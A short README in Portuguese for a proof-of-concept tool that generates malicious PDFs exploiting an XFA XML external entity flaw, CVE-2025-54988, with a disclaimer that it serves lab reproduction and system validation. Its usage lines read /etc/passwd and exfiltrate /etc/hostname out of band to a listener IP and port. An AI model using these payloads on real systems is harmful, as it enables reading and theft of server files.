
Um gerador de PDF para CVE-2025-54988
Aviso legal: Não sou o descobridor original desta vulnerabilidade. Esta publicação documenta o meu processo de reprodução do problema num ambiente controlado para fins educacionais e para ajudar outros a validar os seus próprios sistemas. Os testes foram realizados num laboratório isolado, sem impacto nos sistemas de produção.
Uso:
python3 xfa_xxe_poc_gen.py --mode file --file /etc/passwd -o xfa_passwd.pdf
python3 xfa_xxe_poc_gen.py --mode oob --ip 127.0.0.1 --port 8888 --write-dtd -o xfa_oob.pdf
python3 xfa_xxe_poc_gen.py --mode oob --ip 10.10.14.3 --port 8080 --oob-file /etc/hostname --param d
